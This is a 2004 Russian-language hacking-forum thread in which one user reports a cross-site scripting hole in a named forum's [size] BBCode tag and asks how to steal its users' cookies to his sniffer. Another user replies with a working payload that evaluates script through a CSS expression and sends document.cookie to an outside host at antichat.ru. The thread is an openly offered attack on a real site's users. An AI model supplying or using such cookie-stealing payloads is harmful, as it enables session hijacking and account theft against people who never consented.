Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров?

Discussion in 'Песочница' started by Sky, 2 Nov 2004.

Thread Status:
Not open for further replies.
  1. Sky

    Sky New Member

    Joined:
    26 Aug 2004
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    В одном форуме есть XSS в теге size рабочий пример:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(alert(document.cookie))]lol[/size][/QUOTE]<span id='postcolor'> подскажите пожалуйста какой запрос надо вставить что бы получить куки юзеров к вам на снифер.
     
    #1 Sky, 2 Nov 2004
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Адрес приведи...
    Или мы гадать должны какие там фильтры стоят ?
     
    #2 Algol, 3 Nov 2004
  3. Sky

    Sky New Member

    Joined:
    26 Aug 2004
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Извини вот адрес:
    http://www.lewismedia.com/forums/index.php
    P.S Если не лень подскажи где можно почитать про XSS очень интересная тема спасибо.
     
    #3 Sky, 3 Nov 2004
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Вот такое работает
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    [size=expression(eval(this.innerText))]if(this.sss==null){i=new Image();i.src="http:/"+"/antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=11;this.style.display="none"}[/size]
    [/QUOTE]<span id='postcolor'>
     
    #4 Algol, 4 Nov 2004
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.